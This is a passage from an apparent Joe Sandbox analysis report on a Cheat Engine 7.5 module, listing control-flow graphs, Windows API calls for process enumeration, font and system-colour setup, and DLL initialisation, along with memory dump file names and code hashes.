                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6B4C3C17
                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 6B4C3C27
                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 6B4C3C53
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1238713047-0
                                                                                                                                                                                                                                      • Opcode ID: a73fe3f468f720045bcb1cd697e4b3a2baa19bc52622fbd782dba830be607b62
                                                                                                                                                                                                                                      • Instruction ID: 4dae50ef10f3669132464889c274330b2f0821e9f8529c86f5e7a3e5a9247386
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a73fe3f468f720045bcb1cd697e4b3a2baa19bc52622fbd782dba830be607b62
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B01A17260010C6BDB20EA669D85FEE73ACEB45310F0001AAE905C7241DB399A148BB5

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 6b4fd06c-6b4fd0c9 call 6b600c92 call 6b4d4bd7 GetDeviceCaps 5 6b4fd0cb-6b4fd0da 0->5 6 6b4fd0e4 0->6 7 6b4fd0dc-6b4fd0e2 5->7 8 6b4fd0e6 5->8 6->8 9 6b4fd0e8-6b4fd0f0 7->9 8->9 10 6b4fd106-6b4fd10e 9->10 11 6b4fd0f2-6b4fd0f6 9->11 13 6b4fd124-6b4fd12c 10->13 14 6b4fd110-6b4fd114 10->14 11->10 12 6b4fd0f8-6b4fd100 call 6b4d5812 DeleteObject 11->12 12->10 15 6b4fd12e-6b4fd132 13->15 16 6b4fd142-6b4fd14a 13->16 14->13 18 6b4fd116-6b4fd11e call 6b4d5812 DeleteObject 14->18 15->16 19 6b4fd134-6b4fd13c call 6b4d5812 DeleteObject 15->19 20 6b4fd14c-6b4fd150 16->20 21 6b4fd160-6b4fd168 16->21 18->13 19->16 20->21 26 6b4fd152-6b4fd15a call 6b4d5812 DeleteObject 20->26 27 6b4fd17e-6b4fd186 21->27 28 6b4fd16a-6b4fd16e 21->28 26->21 29 6b4fd19c-6b4fd1a4 27->29 30 6b4fd188-6b4fd18c 27->30 28->27 33 6b4fd170-6b4fd178 call 6b4d5812 DeleteObject 28->33 35 6b4fd1ba-6b4fd1c2 29->35 36 6b4fd1a6-6b4fd1aa 29->36 30->29 34 6b4fd18e-6b4fd196 call 6b4d5812 DeleteObject 30->34 33->27 34->29 41 6b4fd1d8-6b4fd1e0 35->41 42 6b4fd1c4-6b4fd1c8 35->42 36->35 40 6b4fd1ac-6b4fd1b4 call 6b4d5812 DeleteObject 36->40 40->35 44 6b4fd1f6-6b4fd1fe 41->44 45 6b4fd1e2-6b4fd1e6 41->45 42->41 48 6b4fd1ca-6b4fd1d2 call 6b4d5812 DeleteObject 42->48 50 6b4fd214-6b4fd26f call 6b4fcb63 call 6b6031e0 GetTextCharsetInfo 44->50 51 6b4fd200-6b4fd204 44->51 45->44 49 6b4fd1e8-6b4fd1f0 call 6b4d5812 DeleteObject 45->49 48->41 49->44 64 6b4fd276-6b4fd27a 50->64 65 6b4fd271-6b4fd274 50->65 51->50 55 6b4fd206-6b4fd20e call 6b4d5812 DeleteObject 51->55 55->50 66 6b4fd27d-6b4fd284 64->66 67 6b4fd27c 64->67 65->66 68 6b4fd288-6b4fd2a0 lstrcpyW 66->68 69 6b4fd286 66->69 67->66 70 6b4fd30e-6b4fd358 CreateFontIndirectW call 6b4d56b8 call 6b60aa9a call 6b600f20 68->70 71 6b4fd2a2-6b4fd2a9 68->71 69->68 84 6b4fd35f-6b4fd465 CreateFontIndirectW call 6b4d56b8 call 6b4fcb63 CreateFontIndirectW call 6b4d56b8 CreateFontIndirectW call 6b4d56b8 CreateFontIndirectW call 6b4d56b8 GetSystemMetrics lstrcpyW CreateFontIndirectW call 6b4d56b8 GetStockObject 70->84 85 6b4fd35a-6b4fd35c 70->85 71->70 72 6b4fd2ab-6b4fd2c5 EnumFontFamiliesW 71->72 74 6b4fd2dc-6b4fd2f9 EnumFontFamiliesW 72->74 75 6b4fd2c7-6b4fd2da lstrcpyW 72->75 77 6b4fd2fb-6b4fd300 74->77 78 6b4fd302 74->78 75->70 80 6b4fd307-6b4fd308 lstrcpyW 77->80 78->80 80->70 98 6b4fd467-6b4fd476 GetObjectW 84->98 99 6b4fd4e0-6b4fd545 GetStockObject call 6b4d5917 GetObjectW CreateFontIndirectW call 6b4d56b8 CreateFontIndirectW call 6b4d56b8 call 6b4fd9be 84->99 85->84 98->99 100 6b4fd478-6b4fd4db lstrcpyW CreateFontIndirectW call 6b4d56b8 CreateFontIndirectW call 6b4d56b8 98->100 112 6b4fd570-6b4fd572 99->112 100->99 113 6b4fd547-6b4fd54e 112->113 114 6b4fd574-6b4fd599 call 6b4d4ce2 call 6b4d4e52 call 6b600c41 112->114 116 6b4fd59a-6b4fd59f call 6b4cef3e 113->116 117 6b4fd550-6b4fd55a call 6b4c8d81 113->117 117->112 124 6b4fd55c-6b4fd56c 117->124 124->112
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 6B4FD076
                                                                                                                                                                                                                                        • Part of subcall function 6B4D4BD7: __EH_prolog3.LIBCMT ref: 6B4D4BDE
                                                                                                                                                                                                                                        • Part of subcall function 6B4D4BD7: GetWindowDC.USER32(00000000,00000004,6B4FD606,00000000), ref: 6B4D4C0A
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 6B4FD096
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4FD100
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4FD11E
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4FD13C
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4FD15A
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4FD178
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4FD196
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4FD1B4
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4FD1D2
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4FD1F0
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4FD20E
                                                                                                                                                                                                                                      • GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 6B4FD246
                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 6B4FD296
                                                                                                                                                                                                                                      • EnumFontFamiliesW.GDI32(?,00000000,6B4FCA05,Segoe UI), ref: 6B4FD2BD
                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(?,Segoe UI), ref: 6B4FD2D0
                                                                                                                                                                                                                                      • EnumFontFamiliesW.GDI32(?,00000000,6B4FCA05,Tahoma), ref: 6B4FD2EE
                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 6B4FD308
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 6B4FD312
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 6B4FD363
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 6B4FD3A2
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 6B4FD3CE
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 6B4FD3EF
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000048), ref: 6B4FD40E
                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(?,Marlett), ref: 6B4FD421
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 6B4FD42B
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 6B4FD457
                                                                                                                                                                                                                                      • GetObjectW.GDI32(00000000,0000005C,?), ref: 6B4FD46E
                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(?,Arial,?,?,00000000), ref: 6B4FD4AB
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 6B4FD4B5
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 6B4FD4CE
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 6B4FD4E2
                                                                                                                                                                                                                                      • GetObjectW.GDI32(?,0000005C,?), ref: 6B4FD4F7
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 6B4FD505
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 6B4FD526
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD9BE: __EH_prolog3_GS.LIBCMT ref: 6B4FD9C5
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD9BE: GetTextMetricsW.GDI32(?,?), ref: 6B4FD9FA
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD9BE: GetTextMetricsW.GDI32(?,?), ref: 6B4FDA3B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_Stock$CapsCharsetDeviceH_prolog3InfoSystemWindow
                                                                                                                                                                                                                                      • String ID: 0#Lk$Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
                                                                                                                                                                                                                                      • API String ID: 3506729969-143176737
                                                                                                                                                                                                                                      • Opcode ID: 3b4fe98a8ef789c404879533378f55024f5f217a650947d9d8a5f9e2e2f9cdd2
                                                                                                                                                                                                                                      • Instruction ID: e8c4d026ad8ad1aa78104290f3cdcdb91e00c354fb5fd106cd2198c5a0bd507a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b4fe98a8ef789c404879533378f55024f5f217a650947d9d8a5f9e2e2f9cdd2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22E15CB09006499BDF21AFB1CD48FDEBBB8AF45305F0084A9E25AE7291DB78D945CF50

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 6B600A6B
                                                                                                                                                                                                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 6B600A85
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2442719207-0
                                                                                                                                                                                                                                      • Opcode ID: b6d9097846a3518ac7e32286b8c2548b398fe9135194da1637abd4ded6ed81e2
                                                                                                                                                                                                                                      • Instruction ID: 4ea80edc843914bc702ea46c02f95ef9b0efa202451629d29dee4a57fa586a1f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6d9097846a3518ac7e32286b8c2548b398fe9135194da1637abd4ded6ed81e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E41E4F2D0521DABCB199FABCA01FAF3B76EB41B98F004569E81467151DB398D019FA0

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 179 6b4d3cd5-6b4d3d18 call 6b4d0251 GetModuleFileNameW 182 6b4d3d1e call 6b4d565c 179->182 183 6b4d3d1a-6b4d3d1c 179->183 185 6b4d3d23-6b4d3d34 PathFindExtensionW 182->185 183->182 183->185 186 6b4d3d3b-6b4d3d5a call 6b4d3c32 185->186 187 6b4d3d36 call 6b4d565c 185->187 191 6b4d3d5c call 6b4d565c 186->191 192 6b4d3d61-6b4d3d65 186->192 187->186 191->192 194 6b4d3d7f-6b4d3d83 192->194 195 6b4d3d67-6b4d3d79 call 6b60a713 192->195 197 6b4d3dba-6b4d3dbe 194->197 198 6b4d3d85-6b4d3d96 call 6b4d03f1 194->198 195->194 205 6b4d3e9c-6b4d3ea1 call 6b4cef58 195->205 199 6b4d3dfb-6b4d3e05 197->199 200 6b4d3dc0-6b4d3dd8 call 6b4d03f1 197->200 203 6b4d3d9b-6b4d3da3 198->203 206 6b4d3e55-6b4d3e59 199->206 207 6b4d3e07-6b4d3e25 199->207 220 6b4d3dda-6b4d3dec call 6b60a713 200->220 221 6b4d3df4 200->221 210 6b4d3da8-6b4d3db4 call 6b60a713 203->210 211 6b4d3da5 203->211 214 6b4d3e8d-6b4d3e9b call 6b60038c 206->214 215 6b4d3e5b-6b4d3e8b call 6b607a08 call 6b4c6210 call 6b60a713 206->215 208 6b4d3e2c-6b4d3e4e call 6b60a5d6 call 6b4c6210 call 6b60a713 207->208 209 6b4d3e27 207->209 208->205 238 6b4d3e50-6b4d3e52 208->238 209->208 210->197 210->205 211->210 215->205 215->214 220->205 232 6b4d3df2 220->232 221->199 232->199 238->206
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 6B4D3D10
                                                                                                                                                                                                                                      • PathFindExtensionW.SHLWAPI(?), ref: 6B4D3D2A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExtensionFileFindModuleNamePath
                                                                                                                                                                                                                                      • String ID: .CHM$.HLP$.INI
                                                                                                                                                                                                                                      • API String ID: 2295281026-4017452060
                                                                                                                                                                                                                                      • Opcode ID: 26cc96e1d8abe53c0d0f1f272e4e52749dcdbcdb552579741ad34f71d2b7f717
                                                                                                                                                                                                                                      • Instruction ID: b5b6e34c1b1061c45dd29f15f2c332a9ced9c9767facad45db0756907fd3b381
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26cc96e1d8abe53c0d0f1f272e4e52749dcdbcdb552579741ad34f71d2b7f717
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69419FB59007089BEB30DB75C969F9AB3FCAF44304F0048AE9545D7680EFB8E944CB61

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 239 6b600ad4-6b600ae5 call 6b600d40 242 6b600af6-6b600afd 239->242 243 6b600ae7-6b600aed 239->243 245 6b600b09-6b600b1d dllmain_raw 242->245 246 6b600aff-6b600b02 242->246 243->242 244 6b600aef-6b600af1 243->244 247 6b600bcf-6b600bde 244->247 249 6b600b23-6b600b34 dllmain_crt_dispatch 245->249 250 6b600bc6-6b600bcd 245->250 246->245 248 6b600b04-6b600b07 246->248 251 6b600b3a-6b600b3f call 6b4c6814 248->251 249->250 249->251 250->247 253 6b600b44-6b600b4c 251->253 254 6b600b75-6b600b77 253->254 255 6b600b4e-6b600b50 253->255 256 6b600b79-6b600b7c 254->256 257 6b600b7e-6b600b8f dllmain_crt_dispatch 254->257 255->254 258 6b600b52-6b600b70 call 6b4c6814 call 6b600a24 dllmain_raw 255->258 256->250 256->257 257->250 259 6b600b91-6b600bc3 dllmain_raw 257->259 258->254 259->250
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3136044242-0
                                                                                                                                                                                                                                      • Opcode ID: ea88f599faf68697f211f50c5701152029d954f9c270755e78914cfdb8ad0dc0
                                                                                                                                                                                                                                      • Instruction ID: 3306355a60ff5f6b8244e7ce4767bce6efa727db0a6a51b172c4598993d3735b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea88f599faf68697f211f50c5701152029d954f9c270755e78914cfdb8ad0dc0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 372183B1D0561DABCB298F66CE41E6F3B7AEB84B98B014565F81467210DB3A8D018FE0

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000000,6B6948E8), ref: 6B4FCC6D
                                                                                                                                                                                                                                      • VerSetConditionMask.KERNEL32(00000000), ref: 6B4FCC75
                                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6B4FCC86
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00001000), ref: 6B4FCC97
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: __EH_prolog3.LIBCMT ref: 6B4FD5A7
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000016), ref: 6B4FD5B0
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000000F), ref: 6B4FD5C3
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000015), ref: 6B4FD5DA
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000000F), ref: 6B4FD5E6
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetDeviceCaps.GDI32(?,0000000C), ref: 6B4FD60E
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000000F), ref: 6B4FD61C
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000010), ref: 6B4FD62A
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000015), ref: 6B4FD638
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000016), ref: 6B4FD646
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000014), ref: 6B4FD654
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000012), ref: 6B4FD662
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000011), ref: 6B4FD670
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000006), ref: 6B4FD67B
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000000D), ref: 6B4FD686
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000000E), ref: 6B4FD691
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000005), ref: 6B4FD69C
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000008), ref: 6B4FD6AA
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000009), ref: 6B4FD6B5
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000007), ref: 6B4FD6C0
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000002), ref: 6B4FD6CB
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000003), ref: 6B4FD6D6
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000001B), ref: 6B4FD6E4
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000001C), ref: 6B4FD6F2
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000000A), ref: 6B4FD700
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD06C: __EH_prolog3_GS.LIBCMT ref: 6B4FD076
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD06C: GetDeviceCaps.GDI32(?,00000058), ref: 6B4FD096
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD100
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD11E
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD13C
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD15A
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD178
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD196
                                                                                                                                                                                                                                        • Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD1B4
                                                                                                                                                                                                                                        • Part of subcall function 6B4FCCF5: GetSystemMetrics.USER32(00000031), ref: 6B4FCD03
                                                                                                                                                                                                                                        • Part of subcall function 6B4FCCF5: GetSystemMetrics.USER32(00000032), ref: 6B4FCD11
                                                                                                                                                                                                                                        • Part of subcall function 6B4FCCF5: SetRectEmpty.USER32(6B694A54), ref: 6B4FCD24
                                                                                                                                                                                                                                        • Part of subcall function 6B4FCCF5: EnumDisplayMonitors.USER32(00000000,00000000,6B4FCB8D,6B694A54), ref: 6B4FCD34
                                                                                                                                                                                                                                        • Part of subcall function 6B4FCCF5: SystemParametersInfoW.USER32(00000030,00000000,6B694A54,00000000), ref: 6B4FCD43
                                                                                                                                                                                                                                        • Part of subcall function 6B4FCCF5: SystemParametersInfoW.USER32(00001002,00000000,6B694A78,00000000), ref: 6B4FCD70
                                                                                                                                                                                                                                        • Part of subcall function 6B4FCCF5: SystemParametersInfoW.USER32(00001012,00000000,6B694A7C,00000000), ref: 6B4FCD84
                                                                                                                                                                                                                                        • Part of subcall function 6B4FCCF5: SystemParametersInfoW.USER32(0000100A,00000000,6B694A8C,00000000), ref: 6B4FCDAA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
